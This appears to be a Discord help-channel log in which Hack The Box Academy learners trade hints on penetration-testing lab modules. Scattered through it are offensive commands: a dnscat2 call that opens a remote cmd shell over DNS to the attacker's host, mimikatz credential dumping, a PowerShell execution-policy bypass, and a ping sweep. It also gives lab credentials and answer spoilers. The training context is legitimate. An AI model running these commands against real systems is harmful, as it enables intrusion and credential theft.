Is here someone who completed the Process Injection module?

thank youu

https://dontasktoask.com

hi, i am doing password attack skill assessment. i managed to gain access via ntlm hash of stom, now i am completely at sea. what can i do?

Youre right xD

I stuck on the following question:

Run the C:\injection\exercises\debug.bat file to simulate a process injection technique. Investigate the Sysmon logs to get the flag. Answer format is CTF{XXX....}

Module: Process Injection Attacks and Detection

I stuck on it for hours, tried everything, but cannt find the flag... Can someone say in what field the flag is? And what event code. I even checked all the logs.

The flag is not in a field

wtffffffff
But it is in sysmon events, right?

You use the events generated by Sysmon to find it

nxc may be useful to determine if a user is a specific type of user (depends on protocol) #resources-tools message

Yeap, but every event is separarted into fields... Ot the flag isnt in the event itself?

Use the source code to reconstruct the timeline with the help of the events

The events will assist you into finding the culprit (flag) you are looking for

Oh...
I just found it... I was around that all that time, that event exist in my "incident summary", But i though that was deleted xD

Thank you so much!

Module: Shells & Payloads
Section: Infiltrating Windows

Question: Gain a shell on the vulnerable target, then submit the contents of the flag.txt file that can be found in C:\
This question is about replicating the exploitation of Eternal Blue (already demonstrated in the module)
but when I try to do it in the given lab, the exploit always fails.

I tried resetting both Pwnbox and the lab machine, and I tried doing it from my local machine, but it just doesn't work.
And this is all I get:

[-] 10.129.201.97:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.201.97:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.129.201.97:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Am I doing something wrong here?

The check does return "Vulnerable" but the exploit just doesn't work

hey guys can anyone help me understand the difference between an AD domain and a website domain? i mean in an ad environment why must we use <somedomain>.com ? and does it point towards a website? or is it just a practice and can be anything in general?

Noob here with some noob ??. I am using Kali and I get in and all. I am in the middle of the Linux Fund. and am I supposte to be running these commands: sudo apt install openssh-server -y, systemctl status ssh, sudo systemctl start apache2, curl http://localhost, and many more. Or are they info to be thought on later or used later? Because every time I urn the sudo's it asks for a pw and I put in the only one I know and I have had a few "Warning...this will be reported" statements. I'm learning here and I don't have any Sister Betty's smacking me for going to fast or not typing correctly. Any info would be and is good info. Thanks

Hey
Stuck in password attacks modules skill assessment got into jump01 through h___ user got shares from file01 created a username list just confuse what would be the password for password spraying also get the safe3 shortcut file at desktop any hints

Could I possibly DM you around the same topic @fathom pendant? I may have found the file you're referring too but I think I must be applying it incorrectly

if it's referring to the file (and extension 😉 ) hashcat can handle it without any sort of y2john script

Hmm, no I mustn't have that file, mine has a passw in cleartext! I'll keep looking

give me a sec to doublecheck though, my brain could be scrambled between points

i'm curious what file you found in cleartext

because there could be multiple ways forward, i just stuck with some of the more simple stuff

yeah my wires got crossed between the Net Share section and the skill assessment for a sec

but there is a file related to the program on the desktop

Dns does not only point to websites, main role of dns resolution is to convert a name(url or domain in your word) to an ip. DNS is autoconfigured with a name of your choosing when you create an AD domain, and it is required. You don't have to own a domain to use in your AD if it is private, but standard practice is to choose a tld(top level domain) that doesn't exist like htb, thm, etc

at least that's what i used to move forward

local

my apologies my previous hint was unhelpful, my wires were crossed between sections. → you don't need to spray just yet, explore what h has access to. Snaff may mark a finding as {Black} (highest importance)

Do u mean snaffler

Yes

Ok let me see

Tried doesn’t got anything

It should reveal something in an available share

Hi everyone! I’m currently working through the Hack The Box modules, but I’m stuck on one of the questions. No matter how many times I try, I can’t seem to get the correct answer. Could someone help or guide me a bit? Thanks in advance! 🙏

We can't help you if you don't say which module and section

Yes

Also, you can just use first letter * to redact username

ok Sry

New in the group

Thanks for replying! I’m working on the “Linux Fundamentals” module, specifically in the section where we’re asked to identify the network interface with an MTU of 1500.

The issue is that I’ve already run the correct commands like ip a and reviewed the output carefully, but none of the interfaces shown in the terminal are being accepted as the correct answer. I’ve tried all the possible values that appear, including ens3 and tun0, and even double-checked for typos.

Is it possible the question expects a different format or maybe a specific output from a certain user perspective (like htb-student vs current user)? I’m really stuck and would appreciate any guidance.

Hello 🫥

You need to ssh to the target machine first

Also different users wouldn't produce different ip info

Hello, i need some help I think I misunderstood the logic about the module "Introduction to C# > Arrays"

The question : How can you access the element in the third row and second column of a two-dimensional array named grid in C#?
Someone could help me ? ty

for me that is the answer, but no

Hi sorry if this is the wrong section, I've been trying to get EyeWitness to work on my Parrot VM but I'm stuck at this error. I've tried installing all dependencies, installed the clean github version and ran the setup and requirements.txt

@leaden lichen don't dm without asking here. It will get ignored

hey i have a doubt please allow me to DM any moderator, i compeleted a lab but dont know how i completed the lab means i have to know my mistakes

I’m really sorry, I didn’t mean to break the rules. It won’t happen again. Thanks for letting me know

So nobody can help me ?

Probably an unnecessary space

didn't validate

Console.WriteLine(grid[2,1]);

¯_(ツ)_/¯

I haven't done the module

hey can anyone tell me...........

np thanks anyway

The format could also be [n][y]

I'm strugeling with Footprinting Lab - Medium

I've found the T share, but permission denied when trying to look into it.
What am I missing?
https://academy.hackthebox.com/module/112/section/1079

Navigate with sudo

Or as root

I'll try. 😄 Thanks!

was just grid[2, 1];

Ah it was just asking how you'd call it, not how you print it

Yeah... the question says access not print

Managed to find the Admin user for the DB, but login keeps failing, it's the S* user and pass from the ticket.

I'm in the rdp and got the db manager up and running

You're close. But maybe consider password reuse

So not the password from the important file... hmmmm 😄

Well yes the password, but maybe a different user

hii, im hard stucked in module "pass the certificate", i think im doing everything ok but can´t even get the certificate. im talking about the first part of the module, where u have to use ntlmrelayx and printerbug

,hi guys, in password attack module , pass the certificate Section any hint for What are the contents of flag.txt on Administrator's desktop? ,, i tried everything and even found some creds but are not valid. help please.

Make sure to replace the ips where appropriate, and utilize your own ip where applicable as well

can dm?

No

When I went through it, I did everything from the section and it worked just fine

yes but there was an update

I'm referring to doing it after the update

oh

u didnt find problems with the second question?

I had no issues aside from the oscrypto thing. But it all worked just fine

Thanks for the hint, I'm done 😄

Nope, followed everything to a near T and i got everything

i mean i found creds to the admin that seems valid but they didnt work, except over smb where the flag isnt in his desktop there :[ any hints?

The section refers to using evil-winrm

Also there's a dump you can do for admin

Hi guys, im on the knowedge check module (in the same section as privesc from before) and im trying to gain a foothold but cannot find any place to upload, what could i do?

Thats a section, not a module. Getting Started would be the module name

Module = book, section = chapter

Ah got it
So knowledge check section under the getting started module

Yes

So what could i do? Ive been through all the areas in the site

And it may not be a file upload vulnerability

You'll need to find a way into the admin panel to figure out more information

Im in the admin panel and browsed around alot, could it be to do with adding/editing? (Trying not to give out alot more info)

Editing can be useful. Maybe if you research around versions you can figure more out

Alright thanks

Hey i'm really not sure what I'm missing but I'm still struggling on https://academy.hackthebox.com/module/147/section/1334
I've tried manspider with multiple different keywords and found around 10 passwords but none of them have worked, netexec times out instantly, powerhuntshares wasnt finding anything interesting and snaffler output was hard to look through so I may have missed something there.

You can spider with a more specific string. Q1 mentions a domain user. And if the line/file doesn't mention password you may have to get more creative

A list of common credential patterns is provided in the section

ah I didn't notice, ill look at that too

figured it out thanks 🙂

I am currently pursuing a college gradution but i don't have any .edu like emails. Is there a way I can get the 8$ subscription. Just confused. Let me know

You can reach out to support.

Finally found it thank you for the help

Thanks

someone help me out with this one, im new to hack the box just started intro to academy and im stuck with this question: This module is a tier 0 "free" module. What is the total cubes that will be rewarded back to you by completing it?

ans should be 10 right?

If I remember, it should reward you back the amount of cubes you spend on it.

yes

@clear seal be mindful and use more appropriate language

Whoops lol sorry

yeah exactly , but idk whatever am writing it says incorrect answer i wrote 10, same amount what not

at the end of the pass the certificate module u have to privesc to read administrator desktop flag?

I CANT START MY INFO SECURITY LESSON UNTIL I COMPLETE THIS MODULE IM DONE WITH IT ALL JUST THIS 1 QUES REMAINS

Crazy that sucks

verify no spaces

Sent you a dm

nah 😦

With the type of cert you should have you should be able to perform something specific to dump hashes. Numerous ways to do that, plus they do demonstrate one of those ways in the section.

havent been able to find an answer to that specific easy question sir

which section, which module

its intro to academy,academy structure

below htb academy structure, theres module

the answer should be "10"

they're either expecting it as the "number" or "number cubes"

Can I DM someone for nudge on File Inclusion assessment section?

Yo

I am new here

hi this isn't #general , to be able to chat there you'll need to follow the instructions in #welcome

hello i am stuck in the Live engagement Section in shells and payload module i can't find any browser in the foothold machine and also the username and the password givin in the hint how should i have known them or it's just prediction ?

firefox in the terminal also:: look at the desktop

thanks

Hey

Hello everyone,so my phone displays ads every time on every app can't even use my phone for seconds without these ads appearing.I've tried to reset app preferences, look for suspicious apps block permissions but the ads won't stop,any solution if someone knows what's going on with my phone

Factory reset, but this server isn't a tech support server

Try to reset to factory settings and if doesn't help re install operating system. And yes this server is not tech support.

Noted

Can anyone offer a helping hand with the credential hunting in network shares

Hi folks this module seem to spawn the incorrect service, the service spawned is for the content based blind sqli, not the time based blind sqli https://academy.hackthebox.com/module/177/section/1763

Patterns are helpful

I added inlanefreight.htb to /etc/hosts with target IP but I can't ssh in? It keeps telling me permission denied but im using the provided credentials

ssh david@inlanefreight.htb@inlanefreight.htb -p 2222

ah

i was overthinking it, thanks lol

1st module wifi

Follow the steps shown in the section to scan for available WiFi networks. What is the ESSID name of the 3rd WiFi Network (Cell 03)?

root@WiFiIntro:/home/wifi# iwlist wlan0 scan | grep 'Cell|Quality|ESSID|IEEE'
Cell 01 - Address: D8:D6:3A:EB:29:D4
Quality=70/70 Signal level=-30 dBm
ESSID:"HackTheBox"
IE: IEEE 802.11i/WPA2 Version 1
Cell 02 - Address: D8:D6:3A:EB:29:D4
Quality=70/70 Signal level=-30 dBm
ESSID:"HackTheBox-5G"
IE: IEEE 802.11i/WPA2 Version 1
Cell 03 - Address: D8:D6:3D:EB:29:D5
Quality=61/70 Signal level=-49 dBm
ESSID:"CyberNet-Secure"
IE: IEEE 802.11i/WPA2 Version 1

the answer CyberNet-Secure give me an error, could someone help me ?

I'm just following the example, and i can't figure out what am i missing

not sure if i'm missing something or if it is my nc

idk, everything seems ok

Try swapping out the ip in the request to your ip

The dateserver ip*

still no connection D:

weird

is this prompt custom made, or is it the version of msfconsole installed?

I updated metasploit on my local VM, but the prompt is still the same as the old one.

fixed, i'm just dumb

am I only person who is facing problems with login today telling me that I am a bot?

Idk my account was already logged in

support says it all because of google

it's because they use recaptchav3

https://antcpt.com/score_detector/

any ways to improve my score?

try logging in on a different browser or in incognito mode

incognito mode doesn't work even

I tried incognito mode as well

you can also try disabling some extensions

or waiting a little bit then trying again, or using a vpn

haven't had that problem for a very long time

this isn't #general ; read and follow the instructions in #welcome to gain access to more of the server

if you're coming in the server just to troll you can just as easily get the boot

Hey
In Active Directory Enumeration & Attacks > Miscellaneous Misconfigurations, I cannot connect to RDP, has anyone RDP connectivity issues ?

I've tried:

• htb-student:Academy_student_AD!
• htb-student:HTB_@cademy_stdnt!

I RDP to the first one, the other one I was able to connect via SSH

Maybe try $USER instead of $USERNAME

exegol uses the $USER variable for the prompt

It still doesn't work, i tried without variables, but same result

I think you don't need to RDP/SSH into ACADEMY-EA-ATTACK01 to solve the questions

Yeah just like the rest of the module

But if you still want, SSH is working with htb-student:HTB_@cademy_stdnt! credentials.

First question is Find another user with the passwd_notreqd field set. Submit the samaccountname as your answer. The samaccountname starts with the letter "y".
I need to enumerate accounts on the domain, so I need a domained-joined machine, right ?

In the course it's enumerated from PS, I guess I could look for the Linux version, but I was looking to apply the commands presented in the course

Right, MS01 is a domain-joined machine

I got it working with the xfreerdp command

Maybe try restarting the target

or the vm

Yeah that too

I had already done it, but I think it's a target issue - & I should try again - as I tried the target on the section after this one (Domain trust) and was able to RDP with the same command.

Thank you for your answers !

are there modules that reward more cubes than they cost to unlock, aside from the intro?

Look at the example code in the module.
What method will return a string to the Java layer?

Oh I will
Thank you

hey people. In the linux privilege escalation Python library hijacking, i keep getting "sorry, you are not allowed to set the following environment variables: PYTHONPATH"

i cant figure this out for the life of me

any help?

if that doesn't work dm me and i can share my notes

Getting a 403 error in the Prompt Injection Attacks § Direct Prompt Injection lab. Any idea why? Using the correct credentials to forward the ports.

403 error means the server understood the request but refused to process it. Why did it refuse to process isn't known to me, but usually it's a credential issue.

If it's a credential issue then it's also a lab issue because htb-stdnt:4c4demy_Studen7 are the exact credentials that the module instructs you to use.

hello guys
someone know if I needs help in Sherlock who I can ask for ?

no, you will never* go positive in cubes

modules (tier 1 and above) return 20% of the cubes paid

the only exception if you're using an accessed based subscription, you will still get the 20% module return as if it were unlocked with cubes

i got it. You cant use PYTHONPATH because the target does not have SETENV permissions

yep

glad you figured it out to be able to understand why it doesn't work

#sherlocks. You'll need to read the #rules and follow the instructions in #welcome to gain access.

Hi, I believe there is a small error in the module active directory and enumeration (ACL Enumeration) about a powershell 1 line using -filter instead of -LDAPFilter resulting in a "BadEnumeration" error.

I don't see that command in my notes from the module. Did they add it or did I miss it?

it's likely just some weird powershell semantic differences

-Filter uses powershell expression, not LDAP, ObjectClass is a mutivalued attribute in AD and -like doesn't work that way, you can't filter multivalued attributes like OBjectClass using -Filter with -like.

hey guys i have isuse proxychains] Strict chain ... 127.0.0.1:8888 ... 127.0.0.1:8888 <--socket error or timeout!

Most likely the reason is because it's not setup right. Timeout is a network error which makes me think configuration issue. Double check all your settings.

===============================================

===============================================

which module and section is this? it's weird you're trying to use 127.0.0.1

Active Directory Enumeration & Attacks section AD Enumeration & Attacks - Skills Assessment Part II

proxychains just sends your command through the chisel connection you already setup, so you're connecting to the pivot with proxychains and then trying to run evil-winrm against 127.0.0.1, which is the pivot host. so you don't really need proxychains in this situation.

deleted your message because it contains spoilers for a skill assessment

ok

Thanks for the explanation. I understand now that proxychains routes the traffic through the chisel tunnel to the pivot host (127.0.0.1). However, in my setup, I’m trying to reach the target IP (172.16.7.50) through the chisel tunnel by forwarding the correct ports

I have tried everything, but it still doesn’t work.

Hello, I am currently on the Pivoting, Tunneling, and Port Forwarding section and the DNS Tunneling with Dnscat2 module. I am currently getting an error on both my VM and pwnbox when attempting to use the dnscat2 client cmdlet on the windows target machine after starting the dnscat2 server on my attack box. The error from the windows powershell prompt is:

PS C:> Start-Dnscat2 -DNSserver 10.10.14.219 -Domain inlanefreight.local -PreSharedSecret a021cf12e740dc710545419b29c640d4 -Exec cmd
Start-Dnscat2EncInit : Failed to negotiate encryption. Ensure your dnscat2 server is set up correctly.
At C:\dnscat2.ps1:1462 char:20

•     $Session = Start-Dnscat2EncInit $Session $False
  

•                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
  • FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Start-Dnscat2EncInit

The error from my attack box when the connection is attempted and fails is:

dnscat2> New window created: 1
Error caught (for more information, check window 'dns1'):
#<NameError: uninitialized constant SHA3::Digest::SHA256>

Would someone be able to help out regarding the issue I am facing and point me in the right direction?

It seems that the dnscat2 server is missing the SHA3 digest support, which is causing the encryption negotiation to fail on the client side. This typically happens if the Ruby environment running dnscat2 server lacks the required SHA3 digest library.

To fix this, you should ensure that your Ruby installation has the 'digest-sha3' gem installed. You can do this by running: gem install digest-sha3
After installing the gem, restart your dnscat2 server and try again Also, double-check that the server and client versions of dnscat2 are compatible and correctly configured, especially the shared secret and domain settings.

If you are running dnscat2 server on a Linux box, make sure Ruby is updated and that all dependencies are met.

Message #modules

I receive an error when attempting to install the sha3 digest. So I tried a fresh uninstall/reinstall of ruby, still no luck. Would you mind if I DM to troubleshoot further?

The error you’re getting — uninitialized constant SHA3::Digest::SHA256 — usually means the Ruby environment doesn’t have the proper sha3 gem or the version is incompatible. You mentioned you tried reinstalling Ruby, which is a good step. You might want to try this:gem uninstall sha3
gem install sha3 --version "<= 0.1.1" Some users reported success by downgrading the gem version. Also make sure your Ruby version is compatible (e.g., Ruby 2.7.x works more reliably with dnscat2 than newer versions). Again, I’m not super experienced with this

struggling a little on the enumeration hard skills assessment. ive scanned the ports and cant seem to get a foothold into any services. any tips?

Password Attacks - Attacking Windows Credential Manager. Can anyone help me with the question: What is the password mcharles uses for OneDrive? I've got access to the Administrator cmd.exe, downloaded mimikatz.exe with certutil and run [privilege::debug], [sekurlsa::logonpasswords full], [sekurlsa::dpapi], [sekurlsa::credman], but the only password in clear text of mcharles I've found is ||proofs1insight1rustles!||, but when I send the answer is wrong.

that is not the way

Go over the section again, think about what you can do with the credentials you have, and keep in mind there are other ways it shows you other than mimikatz.

Hi guys got stuck on the Password Attacks module on Attacking Windows Credential Manager need help on how I can do a misconfig UAC bypass

Did you manage to solve it stuck there

Hey everyone, I'm on the Password Attacks Module, at the Introduction to JohnTheRipper. I'm supposed to crack a password but I don't have a target to spawn. Am I missing something?

The password hash is in the section, you don't need a target to crack the password. You can use the workstation or your VM to do the cracking

Ah thanks

still need assisstance?

stuck on AD Enumeration & Attacks - Skills Assessment Part I
after kerberoasting and stuff, there is a question about finding a user with plaintext password.
I found a user, but can't retrieve plaintext password via mimikatz.
Any help?

Have you tried nxc

with --lsa flag? Nope

Is there an easy way to do ping sweep on 172.16.X.X network?

without an nmap binary on the target/pivot

for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done this gives me the 172.16.5.X network just fine, not sure how to modify to give me wider range .X.X

Make another loop that for for j in {1..5}

Once the 1..254 is done it will loop to 2, do the 1..254 and repeat

Can someone guide me on how to use the click here to spawn the target system, Linux fundamentals. Am stack on navigation section questions

If I recall correctly, you don't need to you mimikatz to retrieve the cleartext password. Take a look at the Miscellaneous Misconfigurations section to see what are other places you can find cleartext password?

Hope this would help.

Credential Hunting in Network Shares -- Any idea why PowerHuntShares isn't working? Please @ with replies

Is it a PowerShell script? If yes, think about the terminal you need to run it from

Tried Powershell as well

I got the same error, it's as if the script isn't installed right or something

Have you imported the module?

I don't see anything in the powerhuntshares folder to import

Check again, because there is

only thing I found was the .psm1 but that throws me errors any way I try to import, but I'll keep looking I guess, thanks!

That's exactly it. The error is possibly the execution policy, which you need to bypass by running: powershell -ep bypass

"is not recognized as the name of a cmdlet,
function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the
path is correct and try again."

I didn't think that would give any indication that the execution policy was wrong?

or Set-ExecutionPolicy bypass

i'm assuming you just ran it instead of doing
import-module ./powerhuntshare.psm1

... sigh I'm going back to bed lmfao

Hello, I'm stuck in module Active Directory Enumeration & Attacks Skill Assessment 2. I have compromised the MS01 machine but I'm having a hard finding the weak credentials for the second user (Question 4 & 5).
I've tried spraying with the first password on all users, brute-force with common passwords (password, inlanefreight, etc.), I also looked on MS01 for credentials in clear text but no luck. looked in shares also and found nothing (DC included).
Any help would be appreciated (no spoilers plz)

Try information from the Password Spraying Overview section.

Okay, I'll have another look 🙂

Found it, thanks for the advice!

What's the difference between this and "powershell -ep bypass"?

Set-ExecutionPolicy bypass didn't work but "powershell -ep bypass" does

hey guys i just subscribed to VIP for labs but i wait so long and none of the machines load up

powershell -ep bypass just launches a powershell session with the execution policy set to bypass

VIP is for main labs site, not academy read and follow #welcome to access more of the server

its been on this forever Machine is spawning, please stand by...

if you're having technical issues as well: reach out to support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Mmmm

When using nxc to try and spider for creds I keep getting this error... Can anyone help with this? I don't know enough to be able to make sense of this:

``SMB 10.129.234.173 445 DC01 [*] Spidering .
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 986, in non_polling_read
received = self._sock.recv(bytes_left)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
TimeoutError: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/nxc/protocols/smb/smbspider.py", line 166, in search_content
contents = rfile.read(4096)
^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/nxc/protocols/smb/remotefile.py", line 30, in read
data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 572, in readFile
bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 2065, in read_andx
return self.read(tid, fid, offset, max_size, wait_answer)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1400, in read
ans = self.recvSMB(packetID)``

There's more to the error code(s) I just can't paste all of it

and stop working? i had a similar issue but still work i let it run.

This has nothing to do with this channel.

Hey, I don't know how in my burp "proxy" tab is not showing

I think it's any miscofuguration

How can I undo any changes happened ?

Can try View > Restore default tab layout

Guys hello In Introduction to Bash scripting what is the format of the answers?

its not always a flag format

I understand that not flag format in the first exercise I have to submit a number but it doesn't take a number

may be number in letters?

you probably got the wrong number

can you send me your solution

Wish me luck guys, PW Skill Assessment here we go... I give myself 30 minutes of actively trying before I need help LOL

Btw which program did you use to solve this tasks?

i just copied the code to a bash script and edit it

yes but the code should be executed somehow to get results

to see this results somewhere

yeah i just ran bash script.sh

it you edit it correctly you will get the answer

1197735

is my answer

but can't submit it

You should be able to submit it. If you reload the page sometimes that helps.

Dumb qtn but aren't ppl bored reading modules?
I mean Im reading Vulnerability analysis, and I just can't focus it

(I do this as a hobbie, not a pro)

Depends on the subject and the intention of learning. I often skip over or only skim sections, if those aren't areas that are really applicable for me or if I already know the topic quite well. But I try to read as much as possible for the things that I am interested in or think would be really important to do so

did you delete any whitespace?

Hmm makes sense, thx. Idk I have this sort of fomo for imp stuff so i was just trying to read full stuff

thanks for the hint, sorry for late response

Good day, I hope everyone is well! Could someone please help me with the last point of DACL Module I? I've already solved the other three points; I just need the last one. Thanks in advance.

Yes I had whitespace

Hey, anyone know if sharpWSUS behaviour usually like this, the installation of the update just hangs on 33%, if I'm gonna have to always do it manually then what really is the point of the tool lol

I'm stuck on https://academy.hackthebox.com/module/147/section/1657 on the second to last step.
I have root on the system and am currently trying to run proxychains impacket-wmiexec dc01 -k after exporting the location of the ccache file but it continues timing out, the main thing I can think of is if my /etc/hosts file is wrong but I'm not exactly sure. I can provide screenshots in dms if needed.

I accessed the .txt file at the location but it's flag.txt not julio.txt which im assuming means I need to do more prior to gaining access to the file but i'm not sure where to go still

With hosts file for ad stuff/kerberos you need the shortname (dc01) and fqdn (dc01.inlanefreight.local)

I believe I had that, I just gained access to julio through another method, let me retry and set everything up again as my box had shut down and if I'm still struggling I'll come back

Does anyone have a second tosanity check some vhost fuzzing I'm working on? I have set up the /etc/hosts file but the gobuster command I use keeps returning the connection reset by peer. Is there an obvious piece I'm missing here?

@warm tartan for r0lf you need the WHOLE line not just the beginning part but everything in that line

it helps to know what module you're working on and which section

Yes, I suspected it so I tried but I got this output : ┌─[us-academy-5]─[10.10.15.31]─[htb-ac-1501177@htb-dt1lblx9dt]─[~]
└──╼ [★]$ john --single test.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)

how did you put it into the file?

Ah fair enough, I'm pulling out my hair so rushing and not thinking it through. I'm working on the info gathering web module and the virtual host section.

did you paste it or do some echo "thing here" > test.txt

your hosts file should not have the port; the port is specified when you make the request

echo but I succeeded actually just don’t put the extension . txt it’s surprising...

/etc/hosts
10.129.123.46 inlanefreight.htb

-> ffuf -u http://inlanefreight.htb:port

because when you echo it still tried to expand the variables (it interpreted the $texthere as variables)

the extension generally wouldn't matter

from what i recall

ok good to know thank you for the help

if you wanna see more what i mean just do echo "<paste the whole thing>" and you'll see how it massively truncates and fucks everything up

Yeah I have it set properly in the host file then. Also used the basic ffuf command following same syntax as you posted. I also tried the cheeky no host file changes ffuf. ffuf -u http://inlanefrieght.htb:53353 -H "Host: FUZZ.inlanefreight.htb" -w ../../Seclists/Discovery/DNS/subdomains-top1million-500.txt:FUZZ

well... you do need the ip of the target to be able to actually have it try and connect to the proper thing

.htb isn't a publicly routed tld

If you want to prevent the variable expansion, you could also just use single quotes.

instructions in #welcome for how

Ah egg on face, yes I run the IP on that command and hwen I have the hosts setup I'm using the domain in it

i'm aware, i'm more demonstrating why the double quotes is doing what its doing

How is the password attacks module only 8 hours? The rest of the modules times were pretty accurate i think this one is like 3 days instead of 8 hours
Or maybe im finding it hard idk

i wouldn't put too much stock in the time estimates

Its because im trying to do modules that are 8 hours each day

On the CBBH I did them constantly each one each day but this one lol im trying to solve it for 3 days now its definitely not 8 hours

Might be a silly question but would the 'vulnerable box' be setup to reject any IP that doesn't match the VPN network ranges i.e. 192.168.9.122 gets connection reset but a 10.10..15.71 gets run through? The IP I'm enumerating is a public IP so i assumed it wouldnt matter for the VPN being active.

it depends

Fair, in that case I blame strange NAT rules on the company (not HTB) corp network.

We are aware of this, it is being looked at

thanks, i'll try something else

In the Active Directory Enumeration & Attacks I found this problem In section of Making a Target User List

Did you SSH into ATTACK01?

nop

Well, there you go

same prb

screenshot please

Confirm if the DC IP is correct

One sec is the target ip = the DC IP if am right?

Target IP is ATTACK01

oh got it so the ip of DC is the one in the module 172.16.5.5?

they should call it Attacker IP XD

Thanks Bro

welcome, you got it!

I feel so stupid I haven't been on hackthebox for a couple of weeks and I'm getting back and I'm stuck

https://academy.hackthebox.com/module/112/section/1067

I can't do any of the questions I've been reading the module but I just don't understand if it's because I need to configure the "/etc/samba/smb.conf" or I need to do a nmap

I can't connect to the smb server

whats the error?

failed (Error NT_STATUS_HOST_UNREACHABLE)

I've tried multiple commands and I get the same one each time

my nmap was working tho

so I know my vpn is not the issue

also is it normal I always have to use -Pn with my nmap ?

Hi

Can you type this? ꧁꧂

?

I think if you want to skip host discovery meaning that you know that the target is up you put -Pn

yeah but like if I don't use it I get an error

my nmap is failing and tells me to use -Pn which is crazy

i think without the -Pn it sends ICMP Echo requests which by default windows dont reply to so i think thats the reason but i could be wrong

I need help with the guided lab from Intro to Active Directory...I just do not know what to enter into the powershell to add users. It's my first time using AD. Are there any videos I could watch to help?

if you not solve it yet dm me please will see how i can help you

guys is there anyway to access the tier3 modules but the cubes ?

Because they cost a lot to buy the cubes for them

@void tendon Please take care not to post content from modules above tier 0

is there performance issues at the moment with academy? vm's are taking significantly longer to fire up

Hello @cloud urchin

might just be multiple servers as part of the exercise, its working now

Hey

Hi i think there might be an issue

with one of the labs

@tulip minnow Please take care not to post flags

Hey can u help me?

oops sorry

with what

can u help me

its not taking the answeer even tho its correct lol

You didn't say which module/section/question you're on. You may have a flag for another question.

module/41/section/441

I meant reverse the network protocol

No. This channel is dedicated to discussion of the academy modules on HTB, you'll need to read the #rules and follow the instructions in #welcome to gain access to other channels.

i'm not gonna go look that up just say it

JavaScript Deobfuscation

U can’t help with this?

this is the link to it https://academy.hackthebox.com/module/41/section/441

The flag you found is for another question.

oh?

so what does it want

im confused does it want the function?

The question says do what you learned in the module. Try everything the section talked about and you should find it.

im so blind

sorry for my stupidity lol 🤕

not stupid no worries

It depends where you are assessing.

On Windows, with the public profile on standalone host by default, it will block Ping packets. It only allows ICMP on a domain-joined env that has a firewall domain profile selected.

So sending out icmp packets to see if the host is active will likely be blocked over 80% in the real world.

thanks

also can i get a nudge with the password attacks module.. i've been trying to guess mark's password, mutated the wordlist using the ||best64.rule|| from the wordlist before it like 5 times, and now i end up with 4 million passwords, but i'm nowhere near to cracking it

So I’m doing the Linux fundamentals and when it is asking for the index number of the sudoers file in the /etc directory and I run the command ls -i /etc/sudoers and it gives me the index number, when I type in the answer it keeps saying it’s wrong. What do I do?

That's interesting.

I have something I'm slightly confused by right now. I'm in the Getting Started module in the Nibbles box sections. I decided to do the box on the Labs site instead of Academy because I've had issues where targets terminate when I change the page to a new section. But, it seems the flags are different between the Academy version and the Labs version, is this intended?

Edit: The first flag does not work from the flag.txt on the main site (Labs) in the academy answer box.

i cant ping this message as rules break, dont know why. Can @fathom pendant @cloud urchin erase it?

The only option for you is to contact the support team of wherever you were hacked

No one here will help with this. This is not that kind of server.

@fathom void No. Not this kind of server.

@true forum No. Not this kind of server.

@ancient snow Please take care not to spoil content from modules above tier 0, especially skill assessments

You can articulate your issue in such a way that doesn't reveal attack paths or content from the skill assessment, and if you feel like you need to reveal a little more info ask to take it to DM's.

Anyone who has completed the skill assessment doesn't need the intimate details of it because they've done it and know exactly which accounts, what access, etc. No need to say those things at all.

Sorry, I was just answering your question

Why am i having permission to only message here

Because you did not read and follow #welcome

Hello! I am currently doing the module Password Cracking, the section Pass the Certificate, and I am stuck on the second question of getting the Admin flag. I have managed to get the admin credentials but I am unable to log in through evil-winrm. Is there anyone who has done this who could help?

What is the actual error you are getting? Is /etc/krb5.conf and etc/hosts configured correctly? KRBCC5NAME configured?

Hi idk if i ask it here but like this server is abt leaening cybersecurity right

nothing works no VPNs nothing

how do i even do boxes when nothing works goofies

hello guys please who is currently on the pen testing job path, i am trying to find people to study with

I am getting an authentication error
I've configured the realm and kbc of the krb5.conf file, and added the IP and domains to hosts. I've also configured KRB5CCNAME to be the ccache file I obtained

Can you show me a screenshot of krb5.conf ? I didn't understand if you already have the Administrator NT hash or not?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@gloomy ingot
-# see link above to start learning

What is it?

See dm plzz

Alright I'll DM you what I have

Dont dm people without permission
-# ill just ignore them

Sry mb

Ty for help

We cant help you with that, contact gmail support.

Ok

any idea why lab systems in the modules often become unresposive after a short time? refreshing/killing them doesn't stop them to become unresponsive after a couple of scans

